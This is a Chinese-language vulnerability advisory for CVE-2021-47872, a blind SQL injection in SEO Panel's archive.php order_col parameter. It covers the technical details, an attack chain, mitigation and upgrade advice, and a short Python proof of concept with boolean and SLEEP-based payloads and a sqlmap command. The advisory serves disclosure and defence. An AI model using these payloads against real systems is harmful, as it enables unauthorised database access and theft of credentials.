CVE-2021-47872 SEO Panel blind SQL injection vulnerability

漏洞信息

漏洞编号

CVE-2021-47872

漏洞类型

SQL注入

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SEO Panel

漏洞概述

CVE-2021-47872是SEO Panel 4.9.0之前版本中存在的一个高危盲注SQL注入漏洞。该漏洞位于archive.php页面的order_col参数中，允许经过身份验证的低权限攻击者通过操纵该参数来注入恶意SQL代码。由于是盲注类型，攻击者无法直接看到数据库查询结果，但可以通过观察应用程序的响应时间或行为差异来推断数据库信息。攻击者通常使用sqlmap等自动化工具来探测和利用此漏洞，成功利用后可提取敏感数据库信息，包括用户凭证、配置数据等。SEO Panel是一款流行的搜索引擎优化管理工具，广泛应用于网站SEO分析和监控，因此该漏洞对使用该产品的组织构成严重安全风险。建议受影响的用户尽快升级到4.9.0或更高版本以修复此安全问题。

技术细节

该漏洞属于典型的盲注SQL注入（Blind SQL Injection）类型，存在于SEO Panel的archive.php文件中。具体问题在于order_col参数未对用户输入进行充分的过滤和验证。攻击者可以在order_col参数中注入恶意的SQL代码片段，如SQL条件判断语句。由于应用程序不会将查询结果直接返回给攻击者，攻击者需要通过观察不同的注入payload导致的响应差异来推断信息。常见的盲注技术包括：1）基于布尔值的盲注，通过构造条件判断语句（如AND 1=1和AND 1=2）观察响应是否相同；2）基于时间的盲注，使用BENCHMARK()或SLEEP()等函数让数据库延迟响应。攻击者通常利用sqlmap等自动化工具来加速利用过程，自动完成布尔盲注或时间盲注的探测和利用，最终提取目标数据库中的敏感数据。修复方案是在服务端对order_col参数进行严格的输入验证，仅允许预定义的安全列名，或使用参数化查询来防止SQL注入。

攻击链分析

STEP 1

步骤1

攻击者访问SEO Panel登录页面，使用有效凭证登录系统（低权限账户即可）

STEP 2

步骤2

攻击者导航到archive.php页面，准备探测order_col参数

STEP 3

步骤3

攻击者构造恶意SQL注入payload，通过order_col参数注入条件判断语句（如AND 1=1或AND 1=2）

STEP 4

步骤4

攻击者使用sqlmap等自动化工具自动完成盲注探测，识别数据库类型和版本

STEP 5

步骤5

攻击者逐步提取敏感数据，如用户表中的用户名和密码哈希值

STEP 6

步骤6

攻击者利用获取的凭证进一步横向移动或提升权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 # CVE-2021-47872 SEO Panel Blind SQL Injection PoC # Target: SEO Panel < 4.9.0 # Location: archive.php order_col parameter import requests import time target_url = "http://target-site.com/seopanel/archive.php" login_url = "http://target-site.com/seopanel/login.php" # Login credentials credentials = { "email": "[email protected]", "password": "password123" } # Start session and login session = requests.Session() # session.post(login_url, data=credentials) # SQL Injection payload examples: # Boolean-based blind SQL injection payload_boolean_true = "order_col=id AND 1=1" payload_boolean_false = "order_col=id AND 1=2" # Time-based blind SQL injection payload_time = "order_col=id; SELECT SLEEP(5)" # Extract database version using boolean injection def test_blind_sql_injection(): print("Testing CVE-2021-47872 Blind SQL Injection...") # Test with true condition response1 = session.get(target_url, params=payload_boolean_true) # Test with false condition response2 = session.get(target_url, params=payload_boolean_false) if response1.text != response2.text: print("[+] Vulnerability confirmed! Different responses observed.") print("[*] Use sqlmap for full exploitation:") print(f"sqlmap -u '{target_url}?order_col=id' -p order_col --batch") else: print("[-] Vulnerability not confirmed or target not vulnerable") if __name__ == "__main__": test_blind_sql_injection()

影响范围

SEO Panel < 4.9.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）在Web应用防火墙（WAF）中配置规则，拦截包含SQL注入特征的请求，特别是order_col参数中的单引号、分号、AND、OR等关键字；2）限制低权限账户对敏感功能的访问；3）启用数据库查询审计日志，监控异常查询行为；4）考虑临时禁用archive.php页面的排序功能。但最根本的解决方案仍是尽快升级到官方发布的4.9.0版本。